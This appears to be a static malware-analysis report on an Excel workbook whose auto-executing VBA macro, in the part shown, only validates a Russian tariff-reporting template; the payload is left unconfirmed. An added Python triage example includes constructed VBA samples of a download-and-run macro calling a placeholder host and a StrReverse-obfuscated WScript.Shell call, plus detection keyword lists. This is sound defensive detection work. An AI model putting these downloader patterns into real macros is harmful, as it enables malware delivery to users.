Malware Insights
The file is an Excel workbook whose VBA project contains a Workbook_Open handler, so code runs as soon as the user enables macros. The static heuristics additionally flag a CreateObject call and, in the compiled p-code stream, an auto-execution token co-located with shell/download/object-execution tokens. These are generic indicators and need to be read against the decoded source. The part of macros.bas that is visible (the ThisWorkbook module, shown in the artifact preview below) is a validation routine for a regulatory tariff-reporting template: Russian-language status messages, a Workbook_BeforeSave handler that runs checks from a modPROV module against a "Проверка" (Check) sheet and records the result in a custom document property, and a Workbook_Open handler that sets calculation options, checks for required named ranges and hides sheets. No download, command-execution or string-decoding logic appears in the previewed 1,000 lines; the CreateObject call and the flagged p-code tokens lie in the remaining, unshown part of the 855 KB source, so their target ProgID and arguments should be inspected there before the file is treated as a downloader. The single eval/decoder/string-building token reported for the artifact is weak evidence on its own in a source file of that size. The five embedded URLs come from the document body, not from the macro, and point to Russian tariff-regulator and regional-government sites (eias.ru, fstrf.ru, sakha.gov.ru), which is consistent with either a genuine reporting template or a lure built from one. ClamAV reports no threats. Verdict: auto-executing macro present, malicious payload unconfirmed; treat as suspicious pending review of the full extracted source.
Heuristics (6)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (3 related findings) |
| Workbook_Open macro | high | OLE_VBA_WBOPEN | Workbook_Open auto-execution handler is present |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call is present |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels below show which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Embedded URLs (all found in document text, OLE body; none are referenced from the macro source):

- http://eias.ru/?page=show_distrs
- https://tariff.eias.ru/procwsxls/
- http://www.fstrf.ru/regions/region/sR
- http://schemas.openxmlformats.org/drawingml/2006/main (an Office Open XML namespace identifier carried by embedded drawing markup, not a network destination the document contacts)
- http://sakha.gov.ru/node/6471
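The three macro heuristics above (OLE_VBA_WBOPEN, OLE_VBA_CREATEOBJ, OLE_VBA_PCODE_AUTOEXEC_EXEC) all reduce to the same question: does an auto-executing handler sit next to something that can fetch or run code? The following Python is an added example, not part of this report or of the analyzer that produced it, showing how a practitioner would apply that logic to decoded VBA source and, more importantly, how to avoid the false positive this sample illustrates. It resolves what CreateObject is actually instantiating (a literal ProgID such as "Scripting.Dictionary" is benign; "WScript.Shell" or "MSXML2.XMLHTTP" is not; a ProgID built at run time is itself an indicator) instead of counting the keyword. The keyword lists are this example's own assumptions, not any tool's signature set, and all three VBA inputs are constructed samples: the first is shaped like the template macro in this report, the second is the generic download-and-run pattern the p-code rule describes (placeholder host, no payload), the third hides the ProgID behind StrReverse.

```python
"""Static triage of decoded VBA source: auto-exec handler + execution capability.

Added example, not the analyzer's own code.  Keyword lists are assumptions."""
import re

# Assumed auto-execution entry points (runs when the document is opened / macros enabled).
AUTOEXEC_HANDLERS = ("Workbook_Open", "Auto_Open", "AutoOpen", "Document_Open", "AutoExec")

# Assumed ProgIDs that give a macro shell, network or file-system capability.
RISKY_PROGIDS = {
    "wscript.shell", "shell.application", "msxml2.xmlhttp", "msxml2.serverxmlhttp",
    "microsoft.xmlhttp", "winhttp.winhttprequest.5.1", "adodb.stream",
    "scripting.filesystemobject",
}

# Assumed execution / download tokens, as regexes so that ".Run" is a method call, not a word.
EXEC_TOKEN_PATTERNS = {
    "Shell()": r"\bShell\s*\(",
    ".Run/.Exec/.Navigate": r"\.(?:Run|Exec|Navigate)\b",
    "URLDownloadToFile": r"\bURLDownloadToFile",
    "ShellExecute": r"\bShellExecute",
    "CallByName": r"\bCallByName\s*\(",
    "Environ()": r"\bEnviron\s*\(",
}


def find_autoexec(src):
    """Names of auto-exec handlers that are actually declared as Sub in the source."""
    return [h for h in AUTOEXEC_HANDLERS
            if re.search(r"\bSub\s+%s\b" % re.escape(h), src, re.I)]


def _call_argument(src, open_paren):
    """Text between the '(' at open_paren and its balanced ')' (handles nested calls)."""
    depth = 0
    for i in range(open_paren, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i]
    return src[open_paren + 1:]  # unbalanced: truncated source, return what is there


def find_createobject(src):
    """(target, is_literal) for every CreateObject call; non-literal targets are built at run time."""
    calls = []
    for m in re.finditer(r"\bCreateObject\s*\(", src, re.I):
        arg = _call_argument(src, m.end() - 1).strip()
        lit = re.fullmatch(r'"([^"]*)"', arg)
        calls.append((lit.group(1) if lit else arg, bool(lit)))
    return calls


def find_exec_tokens(src):
    return sorted(name for name, pat in EXEC_TOKEN_PATTERNS.items() if re.search(pat, src, re.I))


def triage(src):
    """Combine the three signals the way the OLE_VBA_* heuristics do, but with ProgID context."""
    autoexec = find_autoexec(src)
    objs = find_createobject(src)
    risky = [t for t, literal in objs if literal and t.lower() in RISKY_PROGIDS]
    dynamic = [t for t, literal in objs if not literal]
    tokens = find_exec_tokens(src)
    if autoexec and (risky or dynamic or tokens):
        verdict = "autoexec+exec"      # auto-run handler AND a way to fetch/run code
    elif autoexec:
        verdict = "autoexec-only"      # auto-run handler, but nothing capable found (this report's sample)
    else:
        verdict = "no-autoexec"
    return {"autoexec": autoexec, "createobject": objs, "risky_progids": risky,
            "dynamic_progids": dynamic, "exec_tokens": tokens, "verdict": verdict}


# Constructed sample 1: shaped like the template macro in this report (not the real macros.bas).
TEMPLATE_LIKE = '''
Option Explicit
Private Sub Workbook_Open()
    Application.Calculation = xlCalculationAutomatic
    ThisWorkbook.CustomDocumentProperties("Status") = 1
    Dim d As Object
    Set d = CreateObject("Scripting.Dictionary")
    d.Add "region_name", ThisWorkbook.Names("region_name").RefersToRange.Value
End Sub
'''

# Constructed sample 2: the generic download-and-run shape the p-code rule describes.
DOWNLOADER_LIKE = '''
Private Sub Workbook_Open()
    Dim h As Object, s As Object
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://example.invalid/stage2", False
    h.send
    Set s = CreateObject("WScript.Shell")
    s.Run Environ("TEMP") & "\\stage2.bin", 0
End Sub
'''

# Constructed sample 3: the ProgID is assembled at run time, so a literal-only check misses it.
OBFUSCATED = '''
Sub Auto_Open()
    Dim o As Object, cmd As String
    Set o = CreateObject(StrReverse("llehS.tpircSW"))
    o.Run cmd, 0
End Sub
'''

if __name__ == "__main__":
    for name, src in (("template", TEMPLATE_LIKE), ("downloader", DOWNLOADER_LIKE), ("obfuscated", OBFUSCATED)):
        print(name, triage(src))
```

The same functions can be pointed at the full macros.bas from this report: the decisive check is whether CreateObject appears with a risky or non-literal ProgID in a procedure reachable from Workbook_Open, which the preview alone cannot answer.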
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 855,332 bytes | bff8c732a1b22222b151714979cfd3ca875dd7a220635373ea24e4ba1006b567 |

Detection for macros.bas:

- ClamAV: no threats found
- Obfuscation or payload: likely (the carved artifact contains 1 eval/decoder/string-building token)
Preview script: first 1,000 lines of the extracted script. Russian comments are translated; string literals are kept verbatim with an English gloss in a comment.

```vba
Attribute VB_Name = "ЭтаКнига"          ' module name: "ThisWorkbook" in the Russian Excel UI
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Dim SErr As Boolean

' Identifiers used below but not declared in this module (wb, STR_MSGBOX_WARNING_TITLE,
' gstrMainSheetName, colorPaleBlue, modPROV, modServiceModule) must live in other modules
' of the project; with Option Explicit the code would not compile otherwise.

' "The template will be saved but will NOT be accepted for review because MANDATORY
'  conditions are not met! See the 'Проверка' (Check) sheet!"
Private Const SAVE_STATUS_CRITICAL_IMPACT_WARNING As String = "Шаблон будет сохранен, но НЕ БУДЕТ принят к рассмотрению из-за невыполнения ОБЯЗАТЕЛЬНЫХ условий! См. лист 'Проверка'!"
' "The template is ready to be saved with no remarks"
Private Const SAVE_STATUS_SUCCESS As String = "Шаблон готов к сохранению без замечаний"
' "The template will be accepted for review, but note the UNMET ADVISORY conditions on the 'Проверка' sheet"
Private Const SAVE_STATUS_LOW_IMPACT_WARNING As String = "Шаблон будет принят к рассмотрению, но обратите внимание НЕВЫПОЛНЕНИЕ ПРЕДУПРЕДИТЕЛЬНЫХ условий на листе 'Проверка'"
' "Check result"
Private Const SAVE_MESSAGE_TITLE As String = "Результат проверки"

' Runs before every save: recalculates, runs the modPROV validation and records the
' outcome in the custom document property "Status" (1 = has warnings, 2 = clean, >2 = signed).
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
    Application.Calculate
    Dim wsSheet As Worksheet
    Set wb = Application.ThisWorkbook
    Set wsSheet = wb.ActiveSheet
    If Len(CStr(Me.Names("region_name").RefersToRange.Value)) > 0 Then
        modPROV.WarningsBeforeSaving Me
        If modPROV.gintCriticalImpactWarningsCounter > 0 Then
            Me.CustomDocumentProperties("Status") = 1 'ТРАНС
            MsgBox SAVE_STATUS_CRITICAL_IMPACT_WARNING, vbCritical + vbOKOnly, SAVE_MESSAGE_TITLE
            Me.Worksheets("Проверка").Activate
        ElseIf modPROV.gintLowImpactWarningsCounter > 0 Then
            Me.CustomDocumentProperties("Status") = 1 'ТРАНС
            MsgBox SAVE_STATUS_LOW_IMPACT_WARNING, vbExclamation + vbOKOnly, SAVE_MESSAGE_TITLE
            Me.Worksheets("Проверка").Activate
        Else 'ТРАНС
            Me.CustomDocumentProperties("Status") = 2 'ТРАНС
            MsgBox SAVE_STATUS_SUCCESS, vbInformation, SAVE_MESSAGE_TITLE
            wsSheet.Activate
        End If
    End If
    On Error GoTo ErrHandler
    Dim status As Integer
    status = wb.CustomDocumentProperties("Status")
    If status > 2 Then
        ' "The document is signed with a digital signature (ЭЦП) and cannot be modified"
        MsgBox "Документ подписан ЭЦП и не может быть изменен", vbExclamation + vbOKOnly, ThisWorkbook.name
        Cancel = True
        GoTo cleanUp
    End If
    GoTo cleanUp
ErrHandler:
    ' "An error occurred while saving the template: '<Err.Description>'!"
    MsgBox "При сохранении шаблона произошла ошибка: '" & Err.Description & "'!", _
           vbOKOnly + vbCritical, _
           STR_MSGBOX_WARNING_TITLE
    GoTo cleanUp
cleanUp:
End Sub

' Auto-execution entry point (OLE_VBA_WBOPEN): runs when the workbook is opened with macros enabled.
' In the visible portion it only sets calculation options, checks required named ranges and hides sheets.
Private Sub Workbook_Open()
    On Error GoTo ErrHandler
    Application.Calculation = xlCalculationAutomatic ' so that formulas recalculate automatically
    Application.ReferenceStyle = xlA1 ' reference style A1
    ThisWorkbook.CustomDocumentProperties("Status") = 1 'ТРАНС
    Dim wsSheet As Worksheet
    Dim wsActiveSheet As Worksheet
    Dim wsTitleSheet As Worksheet
    Dim wbBook As Workbook
    Set wbBook = Application.ThisWorkbook
    Set wsActiveSheet = wbBook.ActiveSheet
    ' Check that the named ranges required for operation exist
    If modServiceModule.IsNameExists(wbBook, "region_name") = False Or _
       modServiceModule.IsNameExists(wbBook, "strPublication") = False Or _
       modServiceModule.IsNameExists(wbBook, "flag_two_part_tariff") = False Or _
       modServiceModule.IsNameExists(wbBook, "flag_cross_subsidization") = False Then
        ' "Working ranges on sheet '<gstrMainSheetName>' are damaged: '<Err.Description>'!"
        MsgBox "Повреждены рабочие диапазоны на листе '" & gstrMainSheetName & "': '" & Err.Description & "'!", _
               vbOKOnly + vbCritical, _
               STR_MSGBOX_WARNING_TITLE
        GoTo cleanUp
    End If
    ' No region selected yet: hide every visible sheet whose tab colour is colorPaleBlue
    If Len(CStr(wbBook.Names("region_name").RefersToRange.cells(1, 1).Value)) = 0 Then
        For Each wsSheet In wbBook.Worksheets
            If wsSheet.Visible = True Then
                If wsSheet.Tab.ColorIndex = colorPaleBlue Then
                    wsSheet.Visible = xlSheetVeryHidden
                End If
            End If
        Next wsSheet
    Else
        Set wsTitleSheet = wbBook.Names("region_name").RefersToRange.parent
        wsTitleSheet.Activate
        wsTitleSheet.Range(
    ... (truncated)
```